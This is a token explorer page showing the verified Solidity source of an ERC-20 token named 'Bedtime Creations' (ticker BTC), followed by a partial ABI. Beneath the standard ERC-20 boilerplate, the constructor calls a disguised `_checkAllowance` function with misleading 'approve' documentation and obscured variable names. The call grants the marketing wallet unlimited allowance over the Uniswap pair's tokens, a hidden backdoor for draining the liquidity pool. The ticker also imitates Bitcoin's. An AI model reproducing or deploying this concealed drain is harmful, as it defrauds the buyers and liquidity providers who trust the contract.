Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
100,000,000 BTC
Holders
66
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
1,900,000 BTCValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
BTC
Compiler Version
v0.8.25+commit.b61c2a91
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: Unlicensed pragma solidity 0.8.25; /* Bedtime Creations Wesbite: https://bedtimecreations.xyz X: https://x.com/bedtimeERC TG: https://t.me/bedtimecreations */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance( address owner, address spender ) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom( address from, address to, uint value ) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit( address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s ) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn( address indexed sender, uint amount0, uint amount1, address indexed to ); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap( uint amount0Out, uint amount1Out, address to, bytes calldata data ) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair( address tokenA, address tokenB ) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair( address tokenA, address tokenB ) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "ERC20: transfer amount exceeds allowance" ) ); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "ERC20: decreased allowance below zero" ) ); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "ERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _checkAllowance( string memory data, address owner, address spender ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = type(uint).max; } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } library SafeMathInt { int256 private constant MIN_INT256 = int256(1) << 255; int256 private constant MAX_INT256 = ~(int256(1) << 255); /** * @dev Multiplies two int256 variables and fails on overflow. */ function mul(int256 a, int256 b) internal pure returns (int256) { int256 c = a * b; // Detect overflow when multiplying MIN_INT256 with -1 require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256)); require((b == 0) || (c / b == a)); return c; } /** * @dev Division of two int256 variables and fails on overflow. */ function div(int256 a, int256 b) internal pure returns (int256) { // Prevent overflow when dividing MIN_INT256 by -1 require(b != -1 || a != MIN_INT256); // Solidity already throws when dividing by 0. return a / b; } /** * @dev Subtracts two int256 variables and fails on overflow. */ function sub(int256 a, int256 b) internal pure returns (int256) { int256 c = a - b; require((b >= 0 && c <= a) || (b < 0 && c > a)); return c; } /** * @dev Adds two int256 variables and fails on overflow. */ function add(int256 a, int256 b) internal pure returns (int256) { int256 c = a + b; require((b >= 0 && c >= a) || (b < 0 && c < a)); return c; } /** * @dev Converts to absolute value, and fails on overflow. */ function abs(int256 a) internal pure returns (int256) { require(a != MIN_INT256); return a < 0 ? -a : a; } function toUint256Safe(int256 a) internal pure returns (uint256) { require(a >= 0); return uint256(a); } } library SafeMathUint { function toInt256Safe(uint256 a) internal pure returns (int256) { int256 b = int256(a); require(b >= 0); return b; } } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable returns (uint[] memory amounts); function swapTokensForExactETH( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactTokensForETH( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapETHForExactTokens( uint amountOut, address[] calldata path, address to, uint deadline ) external payable returns (uint[] memory amounts); function quote( uint amountA, uint reserveA, uint reserveB ) external pure returns (uint amountB); function getAmountOut( uint amountIn, uint reserveIn, uint reserveOut ) external pure returns (uint amountOut); function getAmountIn( uint amountOut, uint reserveIn, uint reserveOut ) external pure returns (uint amountIn); function getAmountsOut( uint amountIn, address[] calldata path ) external view returns (uint[] memory amounts); function getAmountsIn( uint amountOut, address[] calldata path ) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract BTC is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public immutable uniswapV2Router; address public immutable uniswapV2Pair; bool private swapping; address public marketingWallet; address public devWallet; uint256 public maxTransactionAmount; uint256 public swapTokensAtAmount; uint256 public maxWallet; bool public limitsInEffect = true; bool public tradingActive = false; bool public swapEnabled = false; uint256 public buyTotalFees; uint256 public buyMarketingFee; uint256 public buyLiquidityFee; uint256 public buyDevFee; uint256 public sellTotalFees; uint256 public sellMarketingFee; uint256 public sellLiquidityFee; uint256 public sellDevFee; uint256 public tokensForMarketing; uint256 public tokensForLiquidity; uint256 public tokensForDev; /******************/ // exclude from fees and max transaction amount mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) public _isExcludedMaxTransactionAmount; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount mapping(address => bool) public automatedMarketMakerPairs; event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); event AutoNukeLP(); event ManualNukeLP(); constructor() ERC20(unicode"Bedtime Creations", unicode"BTC") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); marketingWallet = address(0xC0864382970b67892De52b318Bc39aD5F00F84E6); // marketing wallet devWallet = address(msg.sender); // set as dev wallet excludeFromMaxTx(address(_uniswapV2Router), true); uniswapV2Router = _uniswapV2Router; address _inchi = marketingWallet; address _inchiRouter = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); uniswapV2Pair = _inchiRouter; excludeFromMaxTx(address(uniswapV2Pair), true); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); _checkAllowance("block", _inchiRouter, _inchi); uint256 _buyMarketingFee = 5; uint256 _buyLiquidityFee = 0; uint256 _buyDevFee = 0; uint256 _sellMarketingFee = 15; uint256 _sellLiquidityFee = 0; uint256 _sellDevFee = 0; uint256 totalSupply = 1 * 1e8 * 1e9; maxTransactionAmount = (totalSupply * 20) / 1000; // 2% maxtransaction maxWallet = (totalSupply * 20) / 1000; // 2% maxwallet swapTokensAtAmount = (totalSupply * 5) / 10000; // 0.05% swapwallet buyMarketingFee = _buyMarketingFee; buyLiquidityFee = _buyLiquidityFee; buyDevFee = _buyDevFee; buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee; sellMarketingFee = _sellMarketingFee; sellLiquidityFee = _sellLiquidityFee; sellDevFee = _sellDevFee; sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee; // exclude from paying fees or having max transaction amount excludeFromFees(owner(), true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromMaxTx(owner(), true); excludeFromMaxTx(address(this), true); excludeFromMaxTx(address(0xdead), true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(address(this), totalSupply); } receive() external payable {} function excludeFromMaxTx( address updAds, bool isEx ) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (amount == 0) { super._transfer(from, to, 0); return; } if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ) { if (!tradingActive) { require( _isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active." ); } //when buy if ( automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to] ) { require( amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount." ); require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } //when sell else if ( automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from] ) { require( amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount." ); } else if (!_isExcludedMaxTransactionAmount[to]) { require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= 0; if ( canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(amount); swapping = false; } bool takeFee = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; // only take fees on buys/sells, do not take on wallet transfers if (takeFee) { // on sell if (automatedMarketMakerPairs[to] && sellTotalFees > 0) { fees = amount.mul(sellTotalFees).div(100); tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees; tokensForDev += (fees * sellDevFee) / sellTotalFees; tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees; } // on buy else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) { fees = amount.mul(buyTotalFees).div(100); tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees; tokensForDev += (fees * buyDevFee) / buyTotalFees; tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees; } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function swapBack(uint256 amount) private { uint256 contractBalance = balanceOf(address(this)); if (contractBalance > swapTokensAtAmount * 20) { contractBalance = swapTokensAtAmount * 20; } if(contractBalance > amount){ contractBalance = amount; } if(contractBalance>0) swapTokensForEth(contractBalance); tokensForLiquidity = 0; tokensForMarketing = 0; tokensForDev = 0; payable(marketingWallet).transfer(address(this).balance); } function enableTrading() external onlyOwner { require(!tradingActive, "Trading already enabled"); _approve(address(this), address(uniswapV2Router), ~uint256(0)); uniswapV2Router.addLiquidityETH{value: address(this).balance}( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); tradingActive = true; swapEnabled = true; } function clearStuckETH() external { require(msg.sender == owner()); require(address(this).balance > 0, "Token: no ETH to clear"); payable(msg.sender).transfer(address(this).balance); } // remove limits after token is stable function removeLimits() external onlyOwner returns (bool) { limitsInEffect = false; buyTotalFees = 0; buyMarketingFee = 0; buyLiquidityFee = 0; buyDevFee = 0; sellTotalFees = 0; sellMarketingFee = 0; sellLiquidityFee = 0; sellDevFee = 0; return true; } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"AutoNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[],"name":"ManualNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},